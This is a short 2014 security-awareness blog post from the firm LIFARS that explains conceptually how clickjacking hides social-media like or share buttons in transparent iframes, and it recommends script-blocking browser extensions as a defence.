October 14, 2014 by

Clickjacking: A Short Introduction

Although clickjacking has been around for a while, it’s not a method many people are aware of, although most of us have come in contact with it. Clickjacking is, in simple terms, a way of misleading users to click on a link they never intended to click on. Subsequently, this click is often used for malicious purposes, such as propagating a malicious website on social media sites and obtaining user account details.

HOW DOES IT WORK? 

Let’s take Facebook for example. You see a post with a link that hundreds or even thousands of people like, so you think to yourself: “What’s this fuzz all about? Let me find out!.” You proceed to click on the link within the post which takes you to a site where you can win a free iPad. Awesome! Free stuff! All they need from you is to click the >> WIN << button and it’s yours. So little work for an iPad!

After you click the button, nothing happens…Seemingly. Behind the scenes, you hit the like (or share button, or any link actually) button and helped this post get even more exposure. This button is hosted on a transparent iframe and therefore invisible.

These sort of clickjacking attacks are rather harmless. Double click campaigns, however, can propagate the posts, while allowing you to click on the WIN button as well, which might consequently take you to a site infected by malware. Many of your friends will also click on the clickjacking link (since you shared or liked it on Facebook and they trust you) and so will their friends, and so on, like a chain reaction.

Below is a video depicting another example (digg):

How can you stay protected?

You can use browser extensions such as NoScript (guide) or ScriptSafe to block scripts and use common sense. No one on the internet will give you free iPads or anything similar.

 

 

About the author

Image of Author

LIFARS is the global leader in Digital Forensics and Cyber Resiliency Services. Our experience spans two decades working on high profile events, often in concert with Law Enforcement Agencies around the world. Our proprietary methodology derives directly and indirectly from our experience working with and for U.S. Intelligence Agencies, Interpol, Europol, and NATO. We are solely dedicated to Cyber Resiliency and thus pay close attention to all aspects of our clients’ engagements experience while providing a strategic and integrated array of services to minimum risk and disruption while protecting your brand.

Related articles

Cyberattacks ‘Could Lead to Inadvertent Missile Launches’, Says Think Tank

A number of nuclear weapons systems in the United States, Britain and other countries are at risk...

Read more arrow_forward

47 Million Emails/Day: Necurs Botnet Launches Massive Ransomware Campaign

A cybersecurity firm has revealed it has blocked as many as 47 million emails per day spewed by the...

Read more arrow_forward

Cybercriminals Spoof Millions of Printers, Scanners to Spread Malware

Security researchers have discovered cybercriminals spoofing millions of scanners to launch attacks...

Read more arrow_forward